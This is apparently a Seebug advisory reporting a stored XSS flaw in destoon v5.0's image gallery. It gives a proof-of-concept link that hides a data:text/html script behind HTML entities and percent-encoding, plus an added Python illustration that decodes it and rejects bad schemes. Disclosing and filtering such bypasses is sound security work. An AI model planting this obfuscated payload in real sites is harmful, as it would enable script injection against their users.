destoon /v5.0/ stored XSS, strike wherever you point (bypass 3)

2014-06-11T00:00:00
ID SSV:94493
Type seebug
Reporter Root
Modified 2014-06-11T00:00:00

Description

Brief description:

destoon /v5.0/ stored XSS, strike wherever you point (bypass 3)

Detailed description:

Related URL: WooYun: destoon /v5.0/ stored XSS, strike wherever you point (bypass 2). When publishing to the image gallery, the submitted code is not filtered.

[Screenshot 1.jpg: https://images.seebug.org/upload/201406/110947477e6758bb4df67b5dd8859aa829e34015.jpg]

PoC:

<a href=d&NewLine;&Tab;&#97;ta:text&sol;html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M

Proof of vulnerability:

[Screenshot 2.jpg: https://images.seebug.org/upload/201406/1109482775e1b2896a787b7c6b79c8b4f4257b96.jpg]

Clicking it pops the alert.
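As an added illustration (not part of the original report or of destoon's code), the Python below shows why a prefix check on the raw href text misses this PoC, and how a filter that first decodes HTML character references and removes tab/newline the way a browser does does recover the data: scheme and reject it. The function names and the scheme allowlist are assumptions; the href value is the one from the PoC above.

```python
import html
import re
from typing import Optional
from urllib.parse import unquote

# Assumed allowlist: schemes a user-supplied href may carry. Relative URLs
# have no scheme and pass; data:, javascript:, vbscript: and the rest do not.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# Browsers delete ASCII tab/newline anywhere in a URL and strip leading and
# trailing C0 controls and space before parsing it (WHATWG URL parser).
_TAB_NEWLINE = re.compile(r"[\t\n\r]")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")

def naive_blocked(attr_value: str) -> bool:
    """The kind of check this PoC defeats: a prefix match on the raw
    attribute text, before character references are decoded."""
    return attr_value.lower().startswith(("javascript:", "data:", "vbscript:"))

def normalize_href(attr_value: str) -> str:
    """Decode the attribute as a browser does before URL parsing: HTML
    character references first (&NewLine; &Tab; &#97; &sol; ...), then
    remove tab/newline/CR and strip leading/trailing control characters."""
    decoded = html.unescape(attr_value)
    decoded = _TAB_NEWLINE.sub("", decoded)
    return decoded.strip(_C0_AND_SPACE)

def scheme_of(url: str) -> Optional[str]:
    """Lowercased scheme of a normalized URL, or None if it is relative."""
    match = _SCHEME.match(url)
    return match.group(1).lower() if match else None

def href_is_safe(attr_value: str) -> bool:
    """Allowlist check applied after normalization, not before."""
    scheme = scheme_of(normalize_href(attr_value))
    return scheme is None or scheme in ALLOWED_SCHEMES

def data_url_body(attr_value: str) -> str:
    """Percent-decoded payload after the first comma of a data: URL, so a
    reviewer can see what the link would render; empty if there is none."""
    url = normalize_href(attr_value)
    return unquote(url.split(",", 1)[1]) if "," in url else ""

# The href value from the report's PoC (the text between <a href= and >).
POC_HREF = ("d&NewLine;&Tab;&#97;ta:text&sol;html,"
            "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E")

if __name__ == "__main__":
    print(naive_blocked(POC_HREF), normalize_href(POC_HREF), href_is_safe(POC_HREF))
```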